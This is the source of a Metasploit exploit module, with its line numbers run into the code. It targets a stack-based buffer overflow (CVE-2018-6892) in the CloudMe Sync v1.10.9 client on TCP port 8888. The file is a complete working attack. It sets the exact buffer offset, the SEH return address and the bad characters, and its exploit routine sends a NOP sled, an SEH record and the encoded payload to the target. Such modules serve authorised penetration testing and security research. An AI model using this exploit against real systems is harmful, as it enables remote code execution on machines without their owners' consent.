Path: blob/master/modules/exploits/windows/misc/cloudme_sync.rb
21626 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Remote::Seh1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'CloudMe Sync v1.10.9',16'Description' => %q{17This module exploits a stack-based buffer overflow vulnerability18in CloudMe Sync v1.10.9 client application. This module has been19tested successfully on Windows 7 SP1 x86.20},21'License' => MSF_LICENSE,22'Author' => [23'hyp3rlinx', # Original exploit author24'Daniel Teixeira' # MSF module author25],26'References' => [27[ 'CVE', '2018-6892'],28[ 'EDB', '44027' ],29],30'DefaultOptions' => {31'EXITFUNC' => 'thread'32},33'Platform' => 'win',34'Payload' => {35'BadChars' => "\x00",36},37'Targets' => [38[39'CloudMe Sync v1.10.9',40{41'Offset' => 2232,42'Ret' => 0x61e7b7f643}44]45],46'Privileged' => true,47'DisclosureDate' => '2018-01-17',48'DefaultTarget' => 0,49'Notes' => {50'Reliability' => UNKNOWN_RELIABILITY,51'Stability' => UNKNOWN_STABILITY,52'SideEffects' => UNKNOWN_SIDE_EFFECTS53}54)55)5657register_options([Opt::RPORT(8888)])58end5960def exploit61connect6263buffer = make_nops(target['Offset'])64buffer << generate_seh_record(target.ret)65buffer << payload.encoded6667sock.put(buffer)68handler69end70end717273